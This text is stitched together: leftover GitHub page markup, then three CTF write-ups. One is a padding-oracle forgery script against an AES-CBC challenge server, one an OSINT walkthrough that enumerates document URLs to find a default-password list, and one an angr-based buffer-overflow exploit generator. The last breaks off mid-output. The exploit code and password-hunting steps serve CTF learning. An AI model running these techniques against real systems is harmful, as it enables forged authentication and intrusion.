13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[REVERSE]Crackme</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>[REVERSE]Rocca_pia.py</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> </div> </div> </include-fragment> </div> </div> </div></div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template> </body></html>
# Delphi **Category**: Crypto \**Points**: 998 (18 solves) \**Author**: Sohamster ## Challenge Help me forge a token quickly. `nc crypto.utctf.live 4356` **Hint**: The server is not lagging. ## Overview No source code provided, so let's just try connecting:```$ nc crypto.utctf.live 4356Welcome to the secure flag vault.Only authorized users can retrieve the flag.Just encrypt the following challenge in bytes with the secret key.Use AES-256-CBC with PKCS7 padding. The first 16 bytes should be the IV.Submit it in hex encoded form.For security reasons, only 12289 tries are permitted.Challenge: 80cb208eb56643d4c41c995fb011766dab696872715c1ef75aa42ca09364cc69 Uh-oh. Someone is trying to shut down the system.The connection will close in 29 seconds. 29 seconds remain. 12289 tries left.Please submit authorization token.00Decryption failed.``` ## Solution This is a padding oracle attack on AES-CBC.The challenge we have to encrypt is 32 bytes, so we have to forge 3 blocks. I don't really feel like doing a detailed write-up since there are already many[resources](https://robertheaton.com/2013/07/29/padding-oracle-attack/) onpadding oracle attacks. As always, this image is helpful in understanding what's going on:![cbc](https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/CBC_decryption.svg/1200px-CBC_decryption.svg.png) We use the padding oracle to determine the immediate states where theciphertext is XOR'd with the plaintext, and use that to control the decryption.Since we also control the IV, we have full control over all blocks. The only real twist to this challenge was the time limit. Sending requestsone-by-one would take too long, so a trick I learned was to just send 256messages at once and parse the output in bulk. Most of the work was done in this function I wrote:```pythondef find_imm_chr(iv: bytes, front_ct: bytes, imms: bytes, rnd: int): payloads = [] desired = len(imms) + 1 # The desired padding char """ Example: ??\x03\x03 Then \x03\03 is the front_padding """ front_padding = cun.long_to_bytes(desired) * len(imms) for i in range(256): b = cun.long_to_bytes(i) # imm ^ forged = desired # imm ^ desired = forged forged_tail = pwn.xor(imms, front_padding) tail = b + forged_tail ct = b"\x00" * (16 - len(tail)) + tail payload = iv + ct + front_ct payloads.append(payload.hex()) payload = "\n".join(payloads) io.sendlineafter("Please submit authorization token.", payload) win = False for i in range(256): io.recvline() res = io.recvline().strip() if res == b"Invalid challenge provided.": print(f"[+] Got {i} for round {rnd}") # i ^ imm = desired # i ^ desired = imm imms = cun.long_to_bytes(i ^ desired) + imms win = True io.recvline() io.recvline() if not win: raise ValueError("Failed to forge char, maybe padding was already there?") else: return imms``` To solve for multiple blocks, I did:```pythondef find_imms_block(front_ct): """ Find block of the immediate state using the padding oracle. """ iv = b"\x00" * 16 imms = b"" for rnd in range(16): imms = find_imm_chr(iv, front_ct, imms, rnd) return imms iv = b"\x00" * 16blocks = [os.urandom(16)] # Forge the 3rd padding blockfront_ct = blocks[0]imms = find_imms_block(front_ct)block = pwn.xor(imms, b"\x10" * 16)blocks = [block] + blocksprint(blocks) # Forge the 2nd block (upper 16 bytes of challenge)front_ct = blocks[0]imms = find_imms_block(front_ct)block = pwn.xor(imms, challenge[16:])blocks = [block] + blocksprint(blocks) # Forge the 1st block (lower 16 bytes of challenge)front_ct = blocks[0]imms = find_imms_block(front_ct)block = pwn.xor(imms, challenge[:16])blocks = [block] + blocksprint(blocks)``` Full script is in `solve.py`. I also wrote a local server in `aes.py` fortesting. Output:```$ python3 solve.py[+] Opening connection to crypto.utctf.live on port 4356: Done[+] Got challenge 6ba2cc1f88a3ebc42f0aec850ab4583f86c5e05679e36854bedca1d97ecc4177[+] Got 136 for round 0[+] Got 48 for round 1[+] Got 52 for round 2[+] Got 104 for round 3[+] Got 12 for round 4[+] Got 129 for round 5[+] Got 82 for round 6[+] Got 123 for round 7[+] Got 198 for round 8[+] Got 202 for round 9[+] Got 153 for round 10[+] Got 192 for round 11[+] Got 173 for round 12[+] Got 232 for round 13[+] Got 231 for round 14[+] Got 188 for round 15[b'\xbc\xf8\xf6\xb0\xdc\x82\xd0\xdfcE\x97\x19|\'"\x99', b'@\x1d1\x02\xf5\xebB\xce\xd8\xc7\xb7\xd4\xf0\xfd\xb2G'][+] Got 186 for round 0[+] Got 5 for round 1[+] Got 41 for round 2[+] Got 30 for round 3[+] Got 29 for round 4[+] Got 205 for round 5[+] Got 161 for round 6[+] Got 195 for round 7[+] Got 246 for round 8[+] Got 37 for round 9[+] Got 120 for round 10[+] Got 136 for round 11[+] Got 146 for round 12[+] Got 247 for round 13[+] Got 68 for round 14[+] Got 119 for round 15[b'\xe1\x8e\x19\xc9\xfd\x90G\xabuzj\xc1d\xe6F\xcc', b'\xbc\xf8\xf6\xb0\xdc\x82\xd0\xdfcE\x97\x19|\'"\x99', b'@\x1d1\x02\xf5\xebB\xce\xd8\xc7\xb7\xd4\xf0\xfd\xb2G'][+] Got 235 for round 0[+] Got 164 for round 1[+] Got 221 for round 2[+] Got 232 for round 3[+] Got 64 for round 4[+] Got 245 for round 5[+] Got 213 for round 6[+] Got 248 for round 7[+] Got 70 for round 8[+] Got 218 for round 9[+] Got 241 for round 10[+] Got 73 for round 11[+] Got 119 for round 12[+] Got 105 for round 13[+] Got 63 for round 14[+] Got 219 for round 15[b'\xa0\x92\xabe\xcdY;\x8b\xdf\xd8\x1f\xc0\xe6j\xfe\xd5', b'\xe1\x8e\x19\xc9\xfd\x90G\xabuzj\xc1d\xe6F\xcc', b'\xbc\xf8\xf6\xb0\xdc\x82\xd0\xdfcE\x97\x19|\'"\x99', b'@\x1d1\x02\xf5\xebB\xce\xd8\xc7\xb7\xd4\xf0\xfd\xb2G']a092ab65cd593b8bdfd81fc0e66afed5e18e19c9fd9047ab757a6ac164e646ccbcf8f6b0dc82d0df634597197c272299401d3102f5eb42ced8c7b7d4f0fdb247[*] Switching to interactive mode The flag is utflag{oracle_padded_oops}[*] Got EOF while reading in interactive$```
# Lyra ## The brief ```This is Stage 1 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Use open-source intelligence to track down information on Lyra. With the flag of this challenge, you should also find details you can use in later challenges.``` ## Finding Lyra How can we find her? Well using the previous list again: ![team](./team.png) So we are looking for a `Lyra Patte`. Orion was on twitter, maybe I can find her there as well? ![twitter](./twitter.png) Great! Now what does she have here? ![hint](./hint.png) Is there maybe some sort of vulnerability or disclosure on their site? Time to check it out! `https://constellations.page/constellations-documents/1/` ![1](./1.png) At first glance this is an extremely boring document. All we have are `Hiring Guidelines`. But wait! Is that really all? Take a look at the URL: ```https://constellations.page/constellations-documents/1/ constellations-documents => Folder /1/ => 1st file ```Maybe there's more than one? This can be easily checked by swapping 1 for 2: ![2](./2.png) It works! Now just to find the page with a flag (fuzzing can be used, but this is easily done just manually. Check if there is a document 10. No? Try less, let's say 8, etc.):```https://constellations.page/constellations-documents/5/ CONSTELLATIONS Default Account PasswordsINTERNAL: this should not be shared outside of the orgPersonnel Names User accounts following the naming convention of lowercase firstname. orionpavogusvelaherculesleolyragemini Default Passwordsflag{bd869e6193c27308d2fd3ad4b427e8c3}starstarallstarsstarstruckstarshinestarskypopstarsstarship....```Nice! We have the flag... but this looks oddly similliar to a wordlist... maybe we can use it later.
# AEG **Category**: Pwn \**Points**: 992 (30 solves) \**Author**: hukc ## Challenge I got tired of writing problems and just made a script to do it. Note: Your script may require several runs due to null-byte issues `nc pwn.utctf.live 9997` ## Overview Let's try connecting and see what happens:```$ nc pwn.utctf.live 9997You will be given 10 randomly generated binaries.You have 60 seconds to solve each one.Press enter when you're ready for the first binary. 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............00000010: 0200 3e00 0100 0000 6005 4000 0000 0000 ..>.....`[email protected]: 4000 0000 0000 0000 901c 0000 0000 0000 @..................00002420: 0000 0000 0000 0000 c818 0000 0000 0000 ................00002430: b902 0000 0000 0000 0000 0000 0000 0000 ................00002440: 0100 0000 0000 0000 0000 0000 0000 0000 ................ You have 60 seconds to provide input:``` Cool, so basically we have to automatically generate an exploit.We can parse the hexdump into a binary using `xxd -r 0.hex > 0` Opening it up in Ghidra, the program is pretty simple:```cvoid vuln(char *input) { char buf[44]; encode1(input); encode2(input); encode3(input); encode4(input); encode5(input); encode6(input); encode7(input); memcpy(buf, input, strlen(input)); return;} int main() { char buf [64]; fgets(buf, 64, stdin); vuln(buf); return 0;} void win() { exit(100);}``` There's a buffer overflow `vuln`: Our input is 64 bytes but it uses `memcpy` tomove our input into a 44 byte buffer. Our goal is to call the `win` function and we should be able to overwrite thereturn address stored on the stack, but we have to deal with the `encode`functions that modify our input. ```cvoid encode1(char *s) { for (int i = 0; i < 64; ++i) { s[i] = s[i] ^ 0x85; }} void encode2(char *s) { char local_58; char local_50; char local_48; char local_40; char local_38; char local_30; char local_28; char local_20; int j; int i; i = 0; while (i < 0x10) { j = 0; while (j < 4) { (&local_58)[i * 4 + j] = s[j + *(int *)(grouping1 + (long)i * 4) * 4]; j = j + 1; } i = i + 1; } *(undefined8 *)s = _local_58; *(undefined8 *)(s + 8) = _local_50; *(undefined8 *)(s + 0x10) = _local_48; *(undefined8 *)(s + 0x18) = _local_40; *(undefined8 *)(s + 0x20) = _local_38; *(undefined8 *)(s + 0x28) = _local_30; *(undefined8 *)(s + 0x30) = _local_28; *(undefined8 *)(s + 0x38) = _local_20; return;} ...``` It would be a pain to write a custom script to reverse each of these `encode`functions, so let's use [angr](http://angr.io/) instead. ## Solution This was my first time using angr, so I started by skimming the docs. I alsofound a few examples of similar automatic exploit generation challenges (withsolvers!) [here](https://docs.angr.io/examples#exploitation). After getting a basic understanding of angr, I tried running it in angr to seewhat would happen. ```$ python3 -m venv env$ source env/bin/activate$ pip install angr``` ```python$ python3Python 3.8.5 (default, Jan 27 2021, 15:41:15)[GCC 9.3.0] on linuxType "help", "copyright", "credits" or "license" for more information.>>> import angr>>> filename = "sample/0">>> proj = angr.Project(filename, auto_load_libs=False)>>> state = proj.factory.entry_state(stdin=angr.SimFile)>>> sm = proj.factory.simulation_manager(state)>>> sm.run()WARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior.WARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:WARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | 1) setting a value to the initial stateWARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold nullWARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to suppress these messages.WARNING | 2021-03-15 14:12:11,909 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7fffffffffeff70 with 8 unconstrained bytes referenced from 0x700008 (strlen+0x0 in extern-address space (0x8))WARNING | 2021-03-15 14:12:17,164 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7fffffffffefee0 with 44 unconstrained bytes referenced from 0x700020 (memcpy+0x0 in extern-address space (0x20))WARNING | 2021-03-15 14:12:20,590 | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV64 0x0 .. Reverse((if (strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:31] .. strlen_4_64[31:0]) == 0x3b then (248 + (<...>[423:422] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[415:414] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[23:22] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[303:302] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[295:294] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[287:286] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[55:54] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[207:206] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[199:198] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[191:190] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[311:310] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[495:494] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[487:486] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[479:478] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[439:438] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[271:270] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[263:262] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[255:254] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[119:118] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[399:398] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[391:390] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[383:382] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[471:470] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[239:238] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[231:230] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[223:222] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[151:150] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[47:46] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[39:38] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[31:30] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[279:278] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[143:142] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[135:134] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[127:126] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[183:182] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[79:78] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[71:70] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[63:62] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[247:246] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[335:334] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[327:326] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[319:318] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[87:86] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[175:174] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[167:166] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[159:158] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[375:374] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[463:462] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[455:454] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[447:446] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[215:214] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[111:110] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[103:102] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[95:94] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[343:342] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[15:14] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 248 + (<...>[7:6] .. ~<...> .. ~<...> .. ~<...> .. ~<...>) .. 55 .. 248 + (<...>[407:406] .. ~<...> .. ~<...> .. ~<...> .. ~<...>)) else ((if <...> == <...> then (<...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...> .. <...>) else (<...> .. <...>))[471:8] .. 64))[23:0])><SimulationManager with 1 unconstrained>``` Woah, looks like we got some results: The program terminated with 1unconstrained state.An unconstrained state occurs when we take control of the instructionpointer, hence the "unconstrained" state of execution (we can go towherever we want). Let's inspect the program counter (i.e. instruction pointer): ```python>>> exploitable_state = sm.unconstrained[0]>>> exploitable_state.regs.pc<BV64 0x0 .. (if strlen_4_64[31:0] == 0x3b && strlen_4_64[31:31] == 0 then 248 + (file_0_stdin_0_2_504{UNINITIALIZED}[407:406] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[405:403] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[402:402] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[401:401] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[400:400]) else 64) .. (if strlen_4_64[31:0] == 0x3b && strlen_4_64[31:31] == 0 || strlen_4_64[31:0] == 0x3a && strlen_4_64[31:31] == 0 then 55 else 10) .. (if strlen_4_64[31:0] == 0x3b && strlen_4_64[31:31] == 0 || strlen_4_64[31:0] == 0x3a && strlen_4_64[31:31] == 0 || strlen_4_64[31:0] == 0x39 && strlen_4_64[31:31] == 0 then 248 + (file_0_stdin_0_2_504{UNINITIALIZED}[7:6] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[5:3] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[2:2] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[1:1] .. ~file_0_stdin_0_2_504{UNINITIALIZED}[0:0]) else 79)>``` Cool! We can actually see a bunch of symbolic transformations that were appliedto our input! That means all we need to do is use angr's solver engine to determine which input will set `exploitable_state.regs.pc` to the address of `win`. Here's my script:```pythonimport angrimport claripyimport sys def main(filename): proj = angr.Project(filename, auto_load_libs=False) # There's an fgets in main that reads 64 bytes from stdin. payload = [claripy.BVS(f"byte_{i}", 8) for i in range(64)] payload_ast = claripy.Concat(*payload + [claripy.BVV(b'\n')]) st = proj.factory.full_init_state( args=[filename], add_options=angr.options.unicorn, stdin=payload_ast ) # There aren't really any branches in the program, so let's just run it # until it terminates or reaches an unconstrained state. # --- # An unconstrained state occurs when we take control of the instruction # pointer, hence the "unconstrained" state of execution (we can go to # wherever we want). sm = proj.factory.simulation_manager(st, save_unconstrained=True) sm.run() # Take the first exploitable state that controls instruction pointer (for # this problem there's only one). ep = sm.unconstrained[0] pc = ep.regs.pc # Use the constraints solver to find a payload that sets $rip to the win # address, then save the payload to a file. win = proj.loader.find_symbol("win") ep.add_constraints(ep.regs.pc == win.linked_addr) payload_real = ep.solver.eval(payload_ast, cast_to=bytes) open(f"{filename}.exp", "wb").write(payload_real) print(f"[+] Wrote payload to {filename}.exp") if __name__ == '__main__': main(sys.argv[1])``` Now let's test it:```$ python3 aeg.py sample/0...[+] Wrote payload to sample/0.exp $ ./sample/0 < sample/0.exp $ echo $?100``` That means the program exited with status code `100`, which means that the`win` function was called! Now all that's left is to wrap this in a pwntoolsscript to interact with the challenge server: > Note: For some reason I couldn't get pwntools and angr to work in the same> Python virtualenv, so I had to do an ugly workaround. ```pythonimport pwnimport subprocess def aeg(i: int): """ Run aeg.py in virtualenv with angr installed, since pwntools and angr seem to have dependency conflicts >:( """ filename = f"bins/{i}" cmd = f"./env/bin/python aeg.py {filename}" print(subprocess.check_output(cmd, shell=True)) return open(f"bins/{i}.exp", "rb").read() pwn.context.log_level = "debug"io = pwn.remote("pwn.utctf.live", 9997)io.sendlineafter("Press enter when you're ready for the first binary.", "") for i in range(10): s = io.recvuntilS("You have 60 seconds to provide input:") s = "\n".join(s.split("\n")[:-1]) # Get rid of the last line s = s.strip() open(f"bins/{i}.hex", "w").write(s) # Parse hexdump into a binary file subprocess.check_output(f"xxd -r bins/{i}.hex > bins/{i}", shell=True) exp = aeg(i) io.sendline(exp) io.recvuntil("Process exited with return code") io.recvline() io.interactive()``` The first time I ran it failed on the 6th case due to`claripy.errors.UnsatError: CompositeSolver is already unsat`, so I just ran itagain it gave me the flag! ```$ python3 solve.py...b'[+] Wrote payload to bins/9.exp\n'[DEBUG] Sent 0x42 bytes: 00000000 40 10 04 80 34 88 02 40 04 04 40 01 10 02 08 02 │@···│4··@│··@·│····│ 00000010 20 20 08 10 40 80 40 01 01 20 c2 10 10 02 